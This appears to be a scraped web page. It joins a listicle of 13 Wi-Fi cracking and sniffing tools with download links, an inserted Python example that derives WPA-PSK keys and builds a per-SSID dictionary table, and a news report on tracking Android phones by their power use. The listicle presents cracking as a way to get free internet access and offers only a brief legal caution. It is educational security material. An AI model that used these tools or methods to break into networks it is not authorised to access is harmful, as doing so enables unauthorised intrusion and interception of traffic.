Aircrack is one of the most popular wireless password cracking tools which you can use for 802.11a/b/g WEP and WPA cracking. Aircrack uses the best algorithms to recover wireless passwords by capturing packets. Once enough packets have been gathered, it tries to recover the password. To make the attack faster, it implements a standard FMS attack with some optimizations. The company behind the tool also offers an online tutorial where you can learn how to install and use this tool to crack wireless passwords. It comes as Linux distribution, Live CD and VMware image options. You can use any of these. It supports most of the wireless adapters and is almost guaranteed to work. If you are using a Linux distribution, the only drawback of the tool is that it requires deeper knowledge of Linux. If you are not comfortable with Linux, you will find it hard to use this tool. In this case, try the Live CD or VMware image. The VMware image needs less knowledge, but it only works with a limited set of host OSs, and only USB devices are supported. Before you start using this tool, confirm that the wireless card can inject packets. Then start WEP cracking. Read the online tutorial on the website to know more about the tool. If you follow the steps properly, you will end up getting success with this tool.

Download: http://www.aircrack-ng.org/

2. AirSnort

AirSnort is another popular tool for decrypting WEP encryption on a wi-fi 802.11b network. It is a free tool and comes for Linux and Windows platforms. This tool is no longer maintained, but it is still available to download from Sourceforge. AirSnort works by passively monitoring transmissions and computing encryption keys once it has received enough packets. This tool is simple to use. If you are interested, you can try this tool to crack WEP passwords.

Download: http://sourceforge.net/projects/airsnort/

3. Cain & Abel

Cain & Abel is a popular password cracking tool. This tool is developed to intercept network traffic and then discover passwords by bruteforcing the password using cryptanalysis attack methods. It can also recover wireless network keys by analyzing routing protocols. If you are trying to learn wireless security and password cracking, you should try this tool once.

Download: http://www.oxid.it/cain.html

4. Kismet

Kismet is a wi-fi 802.11 a/b/g/n layer 2 wireless network sniffer and IDS. It works with any wi-fi card which supports rfmon mode. It passively collects packets to identify networks and detect hidden networks. It is built on a client/server modular architecture. It is available for Linux, OS X, Windows and BSD platforms.

Download: http://www.kismetwireless.net/

5. NetStumbler

NetStumbler is a popular Windows tool to find open wireless access points. This tool is free and is available for Windows. A trimmed down version of the tool is also available. It is called MiniStumbler. Basically NetStumbler is used for wardriving, verifying network configurations, finding locations with a poor network, detecting unauthorized access points, and more. But the tool also has a big disadvantage. It can be easily detected by most of the wireless intrusion detection systems available. This is because it actively probes a network to collect useful information. Another disadvantage of the tool is that it does not work properly with the latest 64-bit Windows OS. This is because the tool was last updated back in April 2004. It has been around 11 years since the last stable release of the tool.

Download NetStumbler: http://www.stumbler.net/

6. inSSIDer

inSSIDer is a popular Wi-Fi scanner for Microsoft Windows and OS X operating systems. Initially the tool was open source. Later it became premium and now costs $19.99. It was also awarded as “Best Opensource Software in Networking”. The inSSIDer wi-fi scanner can do various tasks, including finding open wi-fi access points, tracking signal strength, and saving logs with GPS records.

Download inSSIDer: http://www.inssider.com/

7. Wireshark

Wireshark is the network protocol analyzer. It lets you check what is happening in your network. You can live capture packets and analyze them. It captures packets and lets you check data at the micro-level. It runs on Windows, Linux, OS X, Solaris, FreeBSD and others. Wireshark requires good knowledge of network protocols to analyze the data obtained with the tool. If you do not have good knowledge of that, you may not find this tool interesting. So, try it only if you are sure about your protocol knowledge.

Download Wireshark: https://www.wireshark.org/

8. CoWPAtty

CoWPAtty is an automated dictionary attack tool for WPA-PSK. It runs on Linux OS. This program has a command line interface and runs on a word-list that contains the password to use in the attack. Using the tool is really simple, but it is slow. That’s because the hash uses SHA1 with a seed of the SSID. It means the same password will have a different SSIM. So, you cannot simply use the rainbow table against all access points. So, the tool uses the password dictionary and generates the hash for each word contained in the dictionary by using the SSID. The new version of the tool tried to improve the speed by using a pre-computed hash file. This pre-computed file contains around 172000 dictionary entries for around the 1000 most popular SSIDs. But if your SSID is not in those 1000, you are unlucky.

Download CoWPAtty: http://sourceforge.net/projects/cowpatty/

9. Airjack

Airjack is a Wi-Fi 802.11 packet injection tool. This wireless cracking tool is very useful in injecting forged packets and bringing a network down with a denial of service attack. This tool can also be used for a man in the middle attack in the network.

Download AirJack: http://sourceforge.net/projects/airjack/

10. WepAttack

WepAttack is an open source Linux tool for breaking 802.11 WEP keys. This tool performs an active dictionary attack by testing millions of words to find the working key. Only a working WLAN card is required to work with WepAttack.

Download WepAttack: http://wepattack.sourceforge.net/

11. OmniPeek

OmniPeek is another nice packet sniffer and network analyzer tool. This tool is commercial and supports only Windows operating systems. This tool is used to capture and analyze wireless traffic. But it requires you to have good knowledge of protocols to properly understand things. A good thing is that the tool works with most of the network interface cards available in the market. This tool is used for network troubleshooting. This tool also supports plugins, and 40 plugins are already available to extend the features of the tool.

Download: http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer

12. CommView for WiFi

CommView for WiFi is another popular wireless monitor and packet analyzer tool. It comes with an easy to understand GUI. It works fine with 802.11 a/b/g/n/ac networks. It captures every packet and displays useful information as a list. You can get useful information like access points, stations, signal strength, network connections and protocol distribution. Captured packets can be decrypted by user-defined WEP or WPA keys. This tool is basically for wi-fi network admins, security professionals, home users who want to monitor their wi-fi traffic, and programmers working on software for wireless networks.

Download CommView: http://www.tamos.com/products/commwifi/

13. CloudCracker

CloudCracker is an online password cracking tool for cracking WPA protected wi-fi networks. This tool can also be used to crack different password hashes. Just upload the handshake file, enter the network name and start the tool. This tool has a huge dictionary of around 300 million words to perform attacks.

Try CloudCracker: https://www.cloudcracker.com/

Conclusion

In this post, I discussed 13 wireless hacking tools. A few wireless hacking tools are for cracking the password to get unauthorized access, and a few are for monitoring and troubleshooting the network. But most of the people really interested in tools to crack wireless hotspots just want to get free Internet access. The above collection also contains those tools which try a dictionary attack to crack wi-fi passwords to allow you to get free Internet access. But be sure not to use these tools in a risky place. Hacking wireless networks to get unauthorized access may be a crime in your country. You may get into trouble for using these tools. So, please do not use these tools for illegal work.

As I already mentioned, you should never use the WEP encryption key in your home or wireless network. With available tools, it is child’s play to crack the WEP keys and access your wi-fi network. Wireless monitoring and troubleshooting tools are basically for network admins and programmers working on wi-fi based software. These tools really help when some of your systems face problems in connecting to the network.

I hope you enjoyed this article and got relevant information about popular wireless hacking and password cracking tools. I tried my best to compile this list of password hacking tools, but as a human, I may have missed something. If I forgot any important tool in this, please let me know in the comments.

Source
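The CoWPAtty section above says the WPA-PSK dictionary attack is slow because the hash is seeded with the SSID, so a table built for one network cannot be reused against another. The following is an added example (not code from the post or from coWPAtty) that carries out the IEEE 802.11i key derivation with the standard library and checks it against the published test vector (passphrase "password", SSID "IEEE"); the wordlist and SSIDs in the demo are constructed for illustration, and the defender's takeaway is that a non-default SSID alone puts a network outside any precomputed table.

```python
"""Added example: WPA-PSK Pairwise Master Key derivation (IEEE 802.11i)
and why a precomputed per-SSID table does not transfer between networks.
Standard library only; wordlist and SSIDs below are constructed."""
import hashlib
from typing import Dict, List, Optional

PBKDF2_ITERATIONS = 4096   # fixed by the 802.11i standard
PMK_LEN = 32               # 256-bit Pairwise Master Key


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).

    The SSID is the salt: the same passphrase produces a different PMK on
    every network, so one rainbow table cannot cover all access points."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"),
        PBKDF2_ITERATIONS, PMK_LEN)


def precompute_table(ssid: str, wordlist: List[str]) -> Dict[bytes, str]:
    """Per-SSID table of PMK -> passphrase, the kind of file the post says
    coWPAtty ships for the 1000 most common SSIDs.  Each entry costs 4096
    HMAC-SHA1 rounds, which is the 'slow' part the post refers to."""
    return {wpa_pmk(word, ssid): word for word in wordlist}


def table_lookup(table: Dict[bytes, str], pmk: bytes) -> Optional[str]:
    """Return the passphrase whose PMK is in the table, or None."""
    return table.get(pmk)


def demo() -> Dict[str, object]:
    """Same passphrase, default SSID vs. a unique one (constructed values)."""
    words = ["password", "letmein", "sunshine"]          # constructed wordlist
    table_for_default = precompute_table("linksys", words)  # common default SSID
    pmk_default = wpa_pmk("password", "linksys")
    pmk_unique = wpa_pmk("password", "home-net-7f3a")      # constructed SSID
    return {
        # table built for "linksys" finds the weak passphrase there ...
        "hit_on_default_ssid": table_lookup(table_for_default, pmk_default),
        # ... but is useless against the same passphrase under another SSID
        "hit_on_unique_ssid": table_lookup(table_for_default, pmk_unique),
        "pmk_differs_by_ssid": pmk_default != pmk_unique,
    }


if __name__ == "__main__":
    print("802.11i test vector:", wpa_pmk("password", "IEEE").hex())
    print(demo())
```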
  25. Android phones can be tracked without using their GPS or wi-fi data by studying their power use over time, a study has found.

A smartphone uses more power the further away it is from a cellular base and the more obstacles are in its way as it reaches for a signal. Additional power use by other activities could be factored out with algorithms, the researchers found. They created an app designed to collect data about power consumption.

"The malicious app has neither permission to access the GPS nor other location providers (eg cellular or wi-fi network)," the team - Yan Michalevsky, Dan Boneh and Aaron Schulman, from the computer science department at Stanford University, along with Gabi Nakibly, from Rafael Ltd - wrote in their paper. "We only assume permission for network connectivity and access to the power data.

"These are very common permissions for an application, and are unlikely to raise suspicion on the part of the victim."

There are 179 apps currently available on Android app store Google Play that request this information, the team add.

Activity such as listening to music, activating maps, taking voice calls or using social media all drain the battery but this can be discounted due to "machine learning", the report says. "Intuitively the reason why all this noise does not mislead our algorithms is that the noise is not correlated with the phone's location," it says. "Therefore a sufficiently long power measurement (several minutes) enables the learning algorithm to 'see' through the noise."

The tests were carried out on phones using the 3G network but did not measure signal strength as that data is protected by the device.

'Stuffed with sensors'

"With mobile devices now becoming ubiquitous, it is troubling that we are seeing so many ways in which they can be used to track us," said cyber-security expert Prof Alan Woodward, from Surrey University. "I think people sometimes forget that smartphones are stuffed full of sensors from gyroscopes and GPS to the more obvious microphones and cameras.

"This latest work shows that even a basic characteristic (power consumption) has the potential to invade privacy if monitored in the right way," he added. "We are approaching the point where the only safe way to use your phone is to pull the battery out - and not all phones let you do that."

Source